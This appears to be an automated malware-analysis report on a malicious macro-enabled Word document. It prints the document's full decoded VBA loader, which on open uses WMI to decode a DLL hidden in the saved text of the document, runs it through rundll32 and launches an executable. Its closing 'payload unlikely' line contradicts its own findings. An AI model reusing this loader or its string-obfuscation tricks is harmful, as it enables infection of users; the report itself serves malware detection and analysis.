MALICIOUS
318
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Trojan-bf70f023603538ee-bf70f023603538ee-9950269-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Trojan-bf70f023603538ee-bf70f023603538ee-9950269-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115)) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
strLine = Environ$("USERPROFILE") + "\TIQARgY" -
External relationship medium OOXML_EXTERNAL_RELExternal target in word/_rels/settings.xml.rels: 1
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4970 bytes |
SHA-256: 0f11bfece78c23e1ca186ab2d56012109275551883d733d2ec57497e855f3abe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private pid
Private strLine
Private widraw
Private strLine2 As String
Private DeDir As String
Private SeDir As String
Private IntVar As Long
Private IntVar2 As Long
Private ComName As String
Private Sub Document_Open()
Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115))
ComName = ChrW(67) + ChrW(79) + ChrW(77) + ChrW(80) + ChrW(85) + ChrW(84) + ChrW(69) + ChrW(82) + ChrW(78) + ChrW(65) + ChrW(77) + ChrW(69)
strLine = Environ$("USERPROFILE") + "\TIQARgY"
DeDir = ""
SeDir = ""
strLine2 = Environ$(ChrW(65) + ChrW(80) + ChrW(80) + ChrW(68) + ChrW(65) + ChrW(84) + ChrW(65)) + "\" + Environ$(ComName) + "\" + Environ$(ComName)
strLine = Environ$("USERPROFILE") + "\prjATM12"
ActiveDocument.SaveAs2 FileName:=strLine + ".doc", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".xls", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
widraw.create Right(ThisDocument.DefaultTargetFrame + " -decode ", 17) + strLine + ChrW(46) + ChrW(120) + ChrW(108) + ChrW(115) + " " + strLine + ".dll", Null, Null, processid
Do While DeDir = "" Or IntVar > 10
DeDir = Dir(strLine & ".dll")
Module2.Sleep 1000: IntVar = IntVar + 1
Loop
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
If Not DeDir = "" Then
widraw.create Right("cc85g78c89f799bcafb88a9eggebc6fag87rundll32 ", 9) + strLine & ".dll,EntryPoint", Null, Null, threadride
End If
ActiveDocument.SaveAs2 FileName:=strLine + ".doc", FileFormat:=wdFormatText, Encoding:=msoEncodingEBCDICIcelandic
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
If Dir(strLine2 & ".dll") = "" Then
Sleep 5000
If Dir(strLine2 & ".dll") = "" Then
Sleep 3000
widraw.create strLine2 & ".exe", Null, Null, threadride
Else
widraw.create strLine2 & ".exe", Null, Null, threadride
End If
Else
widraw.create strLine2 & ".exe", Null, Null, threadride
End If
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
#If VBA7 Then
Public Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal FUNC_ARG_RAND As Long) As Long
#Else
Public Declare Function Sleep Lib "Kernel32" (ByVal FUNC_ARG_RAND As Long) As Long
#End If
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 19456 bytes |
SHA-256: b31cf443f730c042a4c5798b0e2bf36e514022f41a499d574a2edef36b196c6c |
|||
|
Detection
ClamAV:
Doc.Malware.Alien-9383770-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.